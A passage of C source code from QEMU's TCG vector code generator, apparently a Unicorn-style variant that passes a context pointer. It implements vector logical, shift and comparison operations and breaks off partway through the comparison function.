uint32_t maxsz) { static const GVecGen3 g = { .fni8 = tcg_gen_nor_i64, .fniv = tcg_gen_nor_vec, .fno = gen_helper_gvec_nor, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (aofs == bofs) { tcg_gen_gvec_not(tcg_ctx, vece, dofs, aofs, oprsz, maxsz); } else { tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g); } } void tcg_gen_gvec_eqv(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen3 g = { .fni8 = tcg_gen_eqv_i64, .fniv = tcg_gen_eqv_vec, .fno = gen_helper_gvec_eqv, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (aofs == bofs) { tcg_gen_gvec_dup8i(tcg_ctx, dofs, oprsz, maxsz, -1); } else { tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g); } } static const GVecGen2s gop_ands = { .fni8 = tcg_gen_and_i64, .fniv = tcg_gen_and_vec, .fno = gen_helper_gvec_ands, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }; void tcg_gen_gvec_ands(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz) { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_dup_i64(tcg_ctx, vece, tmp, c); tcg_gen_gvec_2s(tcg_ctx, dofs, aofs, oprsz, maxsz, tmp, &gop_ands); tcg_temp_free_i64(tcg_ctx, tmp); } void tcg_gen_gvec_andi(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz) { TCGv_i64 tmp = tcg_const_i64(tcg_ctx, dup_const(vece, c)); tcg_gen_gvec_2s(tcg_ctx, dofs, aofs, oprsz, maxsz, tmp, &gop_ands); tcg_temp_free_i64(tcg_ctx, tmp); } static const GVecGen2s gop_xors = { .fni8 = tcg_gen_xor_i64, .fniv = tcg_gen_xor_vec, .fno = gen_helper_gvec_xors, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }; void tcg_gen_gvec_xors(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz) { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_dup_i64(tcg_ctx, vece, tmp, c); tcg_gen_gvec_2s(tcg_ctx, dofs, aofs, oprsz, maxsz, tmp, &gop_xors); tcg_temp_free_i64(tcg_ctx, tmp); } void tcg_gen_gvec_xori(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz) { TCGv_i64 tmp = tcg_const_i64(tcg_ctx, dup_const(vece, c)); tcg_gen_gvec_2s(tcg_ctx, dofs, aofs, oprsz, maxsz, tmp, &gop_xors); tcg_temp_free_i64(tcg_ctx, tmp); } static const GVecGen2s gop_ors = { .fni8 = tcg_gen_or_i64, .fniv = tcg_gen_or_vec, .fno = gen_helper_gvec_ors, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }; void tcg_gen_gvec_ors(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz) { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_dup_i64(tcg_ctx, vece, tmp, c); tcg_gen_gvec_2s(tcg_ctx, dofs, aofs, oprsz, maxsz, tmp, &gop_ors); tcg_temp_free_i64(tcg_ctx, tmp); } void tcg_gen_gvec_ori(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz) { TCGv_i64 tmp = tcg_const_i64(tcg_ctx, dup_const(vece, c)); tcg_gen_gvec_2s(tcg_ctx, dofs, aofs, oprsz, maxsz, tmp, &gop_ors); tcg_temp_free_i64(tcg_ctx, tmp); } void tcg_gen_vec_shl8i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t c) { uint64_t mask = dup_const(MO_8, 0xff << c); tcg_gen_shli_i64(tcg_ctx, d, a, c); tcg_gen_andi_i64(tcg_ctx, d, d, mask); } void tcg_gen_vec_shl16i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t c) { uint64_t mask = dup_const(MO_16, 0xffff << c); tcg_gen_shli_i64(tcg_ctx, d, a, c); tcg_gen_andi_i64(tcg_ctx, d, d, mask); } void tcg_gen_gvec_shli(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t shift, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_shli_vec, 0 }; static const GVecGen2i g[4] = { { .fni8 = tcg_gen_vec_shl8i_i64, .fniv = tcg_gen_shli_vec, .fno = gen_helper_gvec_shl8i, .opt_opc = vecop_list, .vece = MO_8 }, { .fni8 = tcg_gen_vec_shl16i_i64, .fniv = tcg_gen_shli_vec, .fno = gen_helper_gvec_shl16i, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_shli_i32, .fniv = tcg_gen_shli_vec, .fno = gen_helper_gvec_shl32i, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_shli_i64, .fniv = tcg_gen_shli_vec, .fno = gen_helper_gvec_shl64i, .opt_opc = vecop_list, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_debug_assert(shift >= 0 && shift < (8 << vece)); if (shift == 0) { tcg_gen_gvec_mov(tcg_ctx, vece, dofs, aofs, oprsz, maxsz); } else { tcg_gen_gvec_2i(tcg_ctx, dofs, aofs, oprsz, maxsz, shift, &g[vece]); } } void tcg_gen_vec_shr8i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t c) { uint64_t mask = dup_const(MO_8, 0xff >> c); tcg_gen_shri_i64(tcg_ctx, d, a, c); tcg_gen_andi_i64(tcg_ctx, d, d, mask); } void tcg_gen_vec_shr16i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t c) { uint64_t mask = dup_const(MO_16, 0xffff >> c); tcg_gen_shri_i64(tcg_ctx, d, a, c); tcg_gen_andi_i64(tcg_ctx, d, d, mask); } void tcg_gen_gvec_shri(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t shift, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_shri_vec, 0 }; static const GVecGen2i g[4] = { { .fni8 = tcg_gen_vec_shr8i_i64, .fniv = tcg_gen_shri_vec, .fno = gen_helper_gvec_shr8i, .opt_opc = vecop_list, .vece = MO_8 }, { .fni8 = tcg_gen_vec_shr16i_i64, .fniv = tcg_gen_shri_vec, .fno = gen_helper_gvec_shr16i, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_shri_i32, .fniv = tcg_gen_shri_vec, .fno = gen_helper_gvec_shr32i, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_shri_i64, .fniv = tcg_gen_shri_vec, .fno = gen_helper_gvec_shr64i, .opt_opc = vecop_list, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_debug_assert(shift >= 0 && shift < (8 << vece)); if (shift == 0) { tcg_gen_gvec_mov(tcg_ctx, vece, dofs, aofs, oprsz, maxsz); } else { tcg_gen_gvec_2i(tcg_ctx, dofs, aofs, oprsz, maxsz, shift, &g[vece]); } } void tcg_gen_vec_sar8i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t c) { uint64_t s_mask = dup_const(MO_8, 0x80 >> c); uint64_t c_mask = dup_const(MO_8, 0xff >> c); TCGv_i64 s = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, d, a, c); tcg_gen_andi_i64(tcg_ctx, s, d, s_mask); /* isolate (shifted) sign bit */ tcg_gen_muli_i64(tcg_ctx, s, s, (2 << c) - 2); /* replicate isolated signs */ tcg_gen_andi_i64(tcg_ctx, d, d, c_mask); /* clear out bits above sign */ tcg_gen_or_i64(tcg_ctx, d, d, s); /* include sign extension */ tcg_temp_free_i64(tcg_ctx, s); } void tcg_gen_vec_sar16i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t c) { uint64_t s_mask = dup_const(MO_16, 0x8000 >> c); uint64_t c_mask = dup_const(MO_16, 0xffff >> c); TCGv_i64 s = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, d, a, c); tcg_gen_andi_i64(tcg_ctx, s, d, s_mask); /* isolate (shifted) sign bit */ tcg_gen_andi_i64(tcg_ctx, d, d, c_mask); /* clear out bits above sign */ tcg_gen_muli_i64(tcg_ctx, s, s, (2 << c) - 2); /* replicate isolated signs */ tcg_gen_or_i64(tcg_ctx, d, d, s); /* include sign extension */ tcg_temp_free_i64(tcg_ctx, s); } void tcg_gen_gvec_sari(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t shift, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_sari_vec, 0 }; static const GVecGen2i g[4] = { { .fni8 = tcg_gen_vec_sar8i_i64, .fniv = tcg_gen_sari_vec, .fno = gen_helper_gvec_sar8i, .opt_opc = vecop_list, .vece = MO_8 }, { .fni8 = tcg_gen_vec_sar16i_i64, .fniv = tcg_gen_sari_vec, .fno = gen_helper_gvec_sar16i, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_sari_i32, .fniv = tcg_gen_sari_vec, .fno = gen_helper_gvec_sar32i, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_sari_i64, .fniv = tcg_gen_sari_vec, .fno = gen_helper_gvec_sar64i, .opt_opc = vecop_list, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_debug_assert(shift >= 0 && shift < (8 << vece)); if (shift == 0) { tcg_gen_gvec_mov(tcg_ctx, vece, dofs, aofs, oprsz, maxsz); } else { tcg_gen_gvec_2i(tcg_ctx, dofs, aofs, oprsz, maxsz, shift, &g[vece]); } } /* * Specialized generation vector shifts by a non-constant scalar. */ typedef struct { void (*fni4)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32); void (*fni8)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64); void (*fniv_s)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_i32); void (*fniv_v)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_vec); gen_helper_gvec_2 *fno[4]; TCGOpcode s_list[2]; TCGOpcode v_list[2]; } GVecGen2sh; static void expand_2sh_vec(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t tysz, TCGType type, TCGv_i32 shift, void (*fni)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_i32)) { TCGv_vec t0 = tcg_temp_new_vec(tcg_ctx, type); uint32_t i; for (i = 0; i < oprsz; i += tysz) { tcg_gen_ld_vec(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); fni(tcg_ctx, vece, t0, t0, shift); tcg_gen_st_vec(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_vec(tcg_ctx, t0); } static void do_gvec_shifts(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i32 shift, uint32_t oprsz, uint32_t maxsz, const GVecGen2sh *g) { TCGType type; uint32_t some; check_size_align(oprsz, maxsz, dofs | aofs); check_overlap_2(dofs, aofs, maxsz); /* If the backend has a scalar expansion, great. */ type = choose_vector_type(tcg_ctx, g->s_list, vece, oprsz, vece == MO_64); if (type) { const TCGOpcode *hold_list = tcg_swap_vecop_list(NULL); switch (type) { case TCG_TYPE_V256: some = QEMU_ALIGN_DOWN(oprsz, 32); expand_2sh_vec(tcg_ctx, vece, dofs, aofs, some, 32, TCG_TYPE_V256, shift, g->fniv_s); if (some == oprsz) { break; } dofs += some; aofs += some; oprsz -= some; maxsz -= some; /* fallthru */ case TCG_TYPE_V128: expand_2sh_vec(tcg_ctx, vece, dofs, aofs, oprsz, 16, TCG_TYPE_V128, shift, g->fniv_s); break; case TCG_TYPE_V64: expand_2sh_vec(tcg_ctx, vece, dofs, aofs, oprsz, 8, TCG_TYPE_V64, shift, g->fniv_s); break; default: g_assert_not_reached(); } tcg_swap_vecop_list(hold_list); goto clear_tail; } /* If the backend supports variable vector shifts, also cool. */ type = choose_vector_type(tcg_ctx, g->v_list, vece, oprsz, vece == MO_64); if (type) { const TCGOpcode *hold_list = tcg_swap_vecop_list(NULL); TCGv_vec v_shift = tcg_temp_new_vec(tcg_ctx, type); if (vece == MO_64) { TCGv_i64 sh64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, sh64, shift); tcg_gen_dup_i64_vec(tcg_ctx, MO_64, v_shift, sh64); tcg_temp_free_i64(tcg_ctx, sh64); } else { tcg_gen_dup_i32_vec(tcg_ctx, vece, v_shift, shift); } switch (type) { case TCG_TYPE_V256: some = QEMU_ALIGN_DOWN(oprsz, 32); expand_2s_vec(tcg_ctx, vece, dofs, aofs, some, 32, TCG_TYPE_V256, v_shift, false, g->fniv_v); if (some == oprsz) { break; } dofs += some; aofs += some; oprsz -= some; maxsz -= some; /* fallthru */ case TCG_TYPE_V128: expand_2s_vec(tcg_ctx, vece, dofs, aofs, oprsz, 16, TCG_TYPE_V128, v_shift, false, g->fniv_v); break; case TCG_TYPE_V64: expand_2s_vec(tcg_ctx, vece, dofs, aofs, oprsz, 8, TCG_TYPE_V64, v_shift, false, g->fniv_v); break; default: g_assert_not_reached(); } tcg_temp_free_vec(tcg_ctx, v_shift); tcg_swap_vecop_list(hold_list); goto clear_tail; } /* Otherwise fall back to integral... */ if (vece == MO_32 && check_size_impl(oprsz, 4)) { expand_2s_i32(tcg_ctx, dofs, aofs, oprsz, shift, false, g->fni4); } else if (vece == MO_64 && check_size_impl(oprsz, 8)) { TCGv_i64 sh64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, sh64, shift); expand_2s_i64(tcg_ctx, dofs, aofs, oprsz, sh64, false, g->fni8); tcg_temp_free_i64(tcg_ctx, sh64); } else { TCGv_ptr a0 = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr a1 = tcg_temp_new_ptr(tcg_ctx); TCGv_i32 desc = tcg_temp_new_i32(tcg_ctx); tcg_gen_shli_i32(tcg_ctx, desc, shift, SIMD_DATA_SHIFT); tcg_gen_ori_i32(tcg_ctx, desc, desc, simd_desc(oprsz, maxsz, 0)); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); g->fno[vece](tcg_ctx, a0, a1, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_i32(tcg_ctx, desc); return; } clear_tail: if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } void tcg_gen_gvec_shls(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i32 shift, uint32_t oprsz, uint32_t maxsz) { static const GVecGen2sh g = { .fni4 = tcg_gen_shl_i32, .fni8 = tcg_gen_shl_i64, .fniv_s = tcg_gen_shls_vec, .fniv_v = tcg_gen_shlv_vec, .fno = { gen_helper_gvec_shl8i, gen_helper_gvec_shl16i, gen_helper_gvec_shl32i, gen_helper_gvec_shl64i, }, .s_list = { INDEX_op_shls_vec, 0 }, .v_list = { INDEX_op_shlv_vec, 0 }, }; tcg_debug_assert(vece <= MO_64); do_gvec_shifts(tcg_ctx, vece, dofs, aofs, shift, oprsz, maxsz, &g); } void tcg_gen_gvec_shrs(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i32 shift, uint32_t oprsz, uint32_t maxsz) { static const GVecGen2sh g = { .fni4 = tcg_gen_shr_i32, .fni8 = tcg_gen_shr_i64, .fniv_s = tcg_gen_shrs_vec, .fniv_v = tcg_gen_shrv_vec, .fno = { gen_helper_gvec_shr8i, gen_helper_gvec_shr16i, gen_helper_gvec_shr32i, gen_helper_gvec_shr64i, }, .s_list = { INDEX_op_shrs_vec, 0 }, .v_list = { INDEX_op_shrv_vec, 0 }, }; tcg_debug_assert(vece <= MO_64); do_gvec_shifts(tcg_ctx, vece, dofs, aofs, shift, oprsz, maxsz, &g); } void tcg_gen_gvec_sars(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i32 shift, uint32_t oprsz, uint32_t maxsz) { static const GVecGen2sh g = { .fni4 = tcg_gen_sar_i32, .fni8 = tcg_gen_sar_i64, .fniv_s = tcg_gen_sars_vec, .fniv_v = tcg_gen_sarv_vec, .fno = { gen_helper_gvec_sar8i, gen_helper_gvec_sar16i, gen_helper_gvec_sar32i, gen_helper_gvec_sar64i, }, .s_list = { INDEX_op_sars_vec, 0 }, .v_list = { INDEX_op_sarv_vec, 0 }, }; tcg_debug_assert(vece <= MO_64); do_gvec_shifts(tcg_ctx, vece, dofs, aofs, shift, oprsz, maxsz, &g); } /* * Expand D = A << (B % element bits) * * Unlike scalar shifts, where it is easy for the target front end * to include the modulo as part of the expansion. If the target * naturally includes the modulo as part of the operation, great! * If the target has some other behaviour from out-of-range shifts, * then it could not use this function anyway, and would need to * do it's own expansion with custom functions. */ static void tcg_gen_shlv_mod_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, TCGv_vec b) { TCGv_vec t = tcg_temp_new_vec_matching(tcg_ctx, d); tcg_gen_dupi_vec(tcg_ctx, vece, t, (8 << vece) - 1); tcg_gen_and_vec(tcg_ctx, vece, t, t, b); tcg_gen_shlv_vec(tcg_ctx, vece, d, a, t); tcg_temp_free_vec(tcg_ctx, t); } static void tcg_gen_shl_mod_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t, b, 31); tcg_gen_shl_i32(tcg_ctx, d, a, t); tcg_temp_free_i32(tcg_ctx, t); } static void tcg_gen_shl_mod_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t, b, 63); tcg_gen_shl_i64(tcg_ctx, d, a, t); tcg_temp_free_i64(tcg_ctx, t); } void tcg_gen_gvec_shlv(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_shlv_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_shlv_mod_vec, .fno = gen_helper_gvec_shl8v, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_shlv_mod_vec, .fno = gen_helper_gvec_shl16v, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_shl_mod_i32, .fniv = tcg_gen_shlv_mod_vec, .fno = gen_helper_gvec_shl32v, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_shl_mod_i64, .fniv = tcg_gen_shlv_mod_vec, .fno = gen_helper_gvec_shl64v, .opt_opc = vecop_list, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } /* * Similarly for logical right shifts. */ static void tcg_gen_shrv_mod_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, TCGv_vec b) { TCGv_vec t = tcg_temp_new_vec_matching(tcg_ctx, d); tcg_gen_dupi_vec(tcg_ctx, vece, t, (8 << vece) - 1); tcg_gen_and_vec(tcg_ctx, vece, t, t, b); tcg_gen_shrv_vec(tcg_ctx, vece, d, a, t); tcg_temp_free_vec(tcg_ctx, t); } static void tcg_gen_shr_mod_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t, b, 31); tcg_gen_shr_i32(tcg_ctx, d, a, t); tcg_temp_free_i32(tcg_ctx, t); } static void tcg_gen_shr_mod_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t, b, 63); tcg_gen_shr_i64(tcg_ctx, d, a, t); tcg_temp_free_i64(tcg_ctx, t); } void tcg_gen_gvec_shrv(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_shrv_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_shrv_mod_vec, .fno = gen_helper_gvec_shr8v, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_shrv_mod_vec, .fno = gen_helper_gvec_shr16v, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_shr_mod_i32, .fniv = tcg_gen_shrv_mod_vec, .fno = gen_helper_gvec_shr32v, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_shr_mod_i64, .fniv = tcg_gen_shrv_mod_vec, .fno = gen_helper_gvec_shr64v, .opt_opc = vecop_list, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } /* * Similarly for arithmetic right shifts. */ static void tcg_gen_sarv_mod_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, TCGv_vec b) { TCGv_vec t = tcg_temp_new_vec_matching(tcg_ctx, d); tcg_gen_dupi_vec(tcg_ctx, vece, t, (8 << vece) - 1); tcg_gen_and_vec(tcg_ctx, vece, t, t, b); tcg_gen_sarv_vec(tcg_ctx, vece, d, a, t); tcg_temp_free_vec(tcg_ctx, t); } static void tcg_gen_sar_mod_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t, b, 31); tcg_gen_sar_i32(tcg_ctx, d, a, t); tcg_temp_free_i32(tcg_ctx, t); } static void tcg_gen_sar_mod_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t, b, 63); tcg_gen_sar_i64(tcg_ctx, d, a, t); tcg_temp_free_i64(tcg_ctx, t); } void tcg_gen_gvec_sarv(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode vecop_list[] = { INDEX_op_sarv_vec, 0 }; static const GVecGen3 g[4] = { { .fniv = tcg_gen_sarv_mod_vec, .fno = gen_helper_gvec_sar8v, .opt_opc = vecop_list, .vece = MO_8 }, { .fniv = tcg_gen_sarv_mod_vec, .fno = gen_helper_gvec_sar16v, .opt_opc = vecop_list, .vece = MO_16 }, { .fni4 = tcg_gen_sar_mod_i32, .fniv = tcg_gen_sarv_mod_vec, .fno = gen_helper_gvec_sar32v, .opt_opc = vecop_list, .vece = MO_32 }, { .fni8 = tcg_gen_sar_mod_i64, .fniv = tcg_gen_sarv_mod_vec, .fno = gen_helper_gvec_sar64v, .opt_opc = vecop_list, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64 }, }; tcg_debug_assert(vece <= MO_64); tcg_gen_gvec_3(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, &g[vece]); } /* Expand OPSZ bytes worth of three-operand operations using i32 elements. */ static void expand_cmp_i32(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, TCGCond cond) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 4) { tcg_gen_ld_i32(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_i32(tcg_ctx, t1, tcg_ctx->cpu_env, bofs + i); tcg_gen_setcond_i32(tcg_ctx, cond, t0, t0, t1); tcg_gen_neg_i32(tcg_ctx, t0, t0); tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t0); } static void expand_cmp_i64(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, TCGCond cond) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 8) { tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_i64(tcg_ctx, t1, tcg_ctx->cpu_env, bofs + i); tcg_gen_setcond_i64(tcg_ctx,cond, t0, t0, t1); tcg_gen_neg_i64(tcg_ctx,t0, t0); tcg_gen_st_i64(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t0); } static void expand_cmp_vec(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t tysz, TCGType type, TCGCond cond) { TCGv_vec t0 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t1 = tcg_temp_new_vec(tcg_ctx, type); uint32_t i; for (i = 0; i < oprsz; i += tysz) { tcg_gen_ld_vec(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_vec(tcg_ctx, t1, tcg_ctx->cpu_env, bofs + i); tcg_gen_cmp_vec(tcg_ctx, cond, vece, t0, t0, t1); tcg_gen_st_vec(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_vec(tcg_ctx, t1); tcg_temp_free_vec(tcg_ctx, t0); } void tcg_gen_gvec_cmp(TCGContext *tcg_ctx, TCGCond cond, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz) { static const TCGOpcode cmp_list[] = { INDEX_op_cmp_vec, 0 }; static gen_helper_gvec_3 * const eq_fn[4] = { gen_helper_gvec_eq8, gen_helper_gvec_eq16, gen_helper_gvec_eq32, gen_helper_gvec_eq64 }; static gen_helper_gvec_3 * const ne_fn[4] = { gen_helper_gvec_ne8, gen_helper_gvec_ne16, gen_helper_gvec_ne32, gen_helper_gvec_ne64 }; static gen_helper_gvec_3 * const lt_fn[4] = { gen_helper_gvec_lt8, gen_helper_gvec_lt16, gen_helper_gvec_lt32, gen_helper_gvec_lt64 }; static gen_helper_gvec_3 * const le_fn[4] = { gen_helper_gvec_le8, gen_helper_gvec_le16, gen_helper_gvec_le32, gen_helper_gvec_le64 }; static gen_helper_gvec_3 * const ltu_fn[4] = { gen_helper_gvec_ltu8, gen_helper_gvec_ltu16, gen_helper_gvec_ltu32, gen_helper_gvec_ltu64 }; static gen_helper_gvec_3 * const leu_fn[4] = { gen_helper_gvec_leu8, gen_helper_gvec_leu16, gen_helper_gvec_leu32, gen_helper_gvec_leu64 }; static gen_helper_gvec_3 * const * const fns[16] = { [TCG_COND_EQ] = eq_fn, [TCG_COND_NE] = ne_fn, [TCG_COND_LT] = lt_fn, [TCG_COND_LE] = le_fn, [TCG_COND_LTU] = ltu_fn, [TCG_COND_LEU] = leu_fn, }; const TCGOpcode *hold_list; TCGType type; uint32_t some; check_size_align(oprsz, maxsz, dofs | aofs | bofs); check_overlap_3(dofs, aofs, bofs, maxsz); if (cond == TCG_COND_NEVER || cond == TCG_COND_ALWAYS) { do_dup(tcg_ctx, MO_8, dofs, oprsz, maxsz, NULL, NULL, -(cond == TCG_COND_ALWAYS)); return; } /* * Implement inline with a vector type, if possible. * Prefer integer when 64-bit host and 64-bit comparison. */ hold_list = tcg_swap_vecop_list(cmp_list); type = choose_vector_type(tcg_ctx, cmp_list, vece, oprsz, TCG_TARGET_REG_BITS == 64 && vece == MO_64); switch (type) { case TCG_TYPE_V256: /* Recall that ARM SVE allows vector sizes that are not a * power of 2, but always a multiple of 16. The intent is * that e.g. size == 80 would be expanded with 2x32 + 1x16. */ some = QEMU_ALIGN_DOWN(oprsz, 32); expand_cmp_vec(tcg_ctx, vece, dofs, aofs, bofs, some, 32, TCG_TYPE_V256, cond); if (some == oprsz) { break; } dofs += some; aofs += some; bofs += some; oprsz -= some; maxsz -= some; /* fallthru */ case TCG_TYPE_V128: 